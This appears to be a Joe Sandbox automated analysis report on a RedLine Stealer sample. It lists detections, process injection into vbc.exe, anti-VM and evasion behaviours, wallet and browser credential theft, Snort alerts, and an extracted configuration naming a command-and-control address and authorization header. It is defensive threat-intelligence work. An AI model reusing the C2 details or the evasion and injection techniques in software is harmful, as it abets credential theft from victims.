Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
Analysis ID:756115
MD5:34a852c0f62294480e1e6e154b00539a
SHA1:6204b0e10eaf8094da16cb5ca7c325f1dbfa97f0
SHA256:f461d11f2fac14f49aeedd66999b404cfce4138d27fe7e1da79f0aa85eee5149
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to inject code into remote processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe (PID: 3384 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe MD5: 34A852C0F62294480E1E6E154B00539A)
    • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 260 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
    • conhost.exe (PID: 576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["193.106.191.138:32796"], "Authorization Header": "54c79ce081122137049ee07c0a2f38ab"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.318847444.00000000005E2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 3 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x21068:$pat14: , CommandLine:
                  • 0x18d64:$v2_1: ListOfProcesses
                  • 0x18af8:$v4_3: base64str
                  • 0x19b83:$v4_4: stringKey
                  • 0x16708:$v4_5: BytesToStringConverted
                  • 0x15770:$v4_6: FromBase64
                  • 0x16edc:$v4_8: procName
                  • 0x1725f:$v5_1: DownloadAndExecuteUpdate
                  • 0x18a08:$v5_2: ITaskProcessor
                  • 0x1724d:$v5_3: CommandLineUpdate
                  • 0x1723e:$v5_4: DownloadUpdate
                  • 0x178f2:$v5_5: FileScanning
                  • 0x16a77:$v5_7: RecordHeaderField
                  • 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x1f468:$pat14: , CommandLine:
                    • 0x17164:$v2_1: ListOfProcesses
                    • 0x16ef8:$v4_3: base64str
                    • 0x17f83:$v4_4: stringKey
                    • 0x14b08:$v4_5: BytesToStringConverted
                    • 0x13b70:$v4_6: FromBase64
                    • 0x152dc:$v4_8: procName
                    • 0x1565f:$v5_1: DownloadAndExecuteUpdate
                    • 0x16e08:$v5_2: ITaskProcessor
                    • 0x1564d:$v5_3: CommandLineUpdate
                    • 0x1563e:$v5_4: DownloadUpdate
                    • 0x15cf2:$v5_5: FileScanning
                    • 0x14e77:$v5_7: RecordHeaderField
                    • 0x14896:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                    0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.5193.106.191.13849699327962850027 11/29/22-16:50:39.536972
                      SID:2850027
                      Source Port:49699
                      Destination Port:32796
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.5193.106.191.13849699327962850286 11/29/22-16:51:03.828285
                      SID:2850286
                      Source Port:49699
                      Destination Port:32796
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:193.106.191.138192.168.2.532796496992850353 11/29/22-16:50:41.373927
                      SID:2850353
                      Source Port:32796
                      Destination Port:49699
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeVirustotal: Detection: 30%Perma Link
                      Machine Learning detection for sample
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeJoe Sandbox ML: detected
                      Source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["193.106.191.138:32796"], "Authorization Header": "54c79ce081122137049ee07c0a2f38ab"}
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09F9F6D0h2_2_09F9F6B8

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49699 -> 193.106.191.138:32796
                      Source: TrafficSnort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49699 -> 193.106.191.138:32796
                      Source: TrafficSnort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 193.106.191.138:32796 -> 192.168.2.5:49699
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 193.106.191.138 ports 2,3,32796,6,7,9
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 193.106.191.138:32796
                      Source: Joe Sandbox ViewASN Name: BOSPOR-ASRU BOSPOR-ASRU
                      Source: Joe Sandbox ViewIP Address: 193.106.191.138 193.106.191.138
                      Source: global trafficTCP traffic: 192.168.2.5:49699 -> 193.106.191.138:32796
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faulth
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
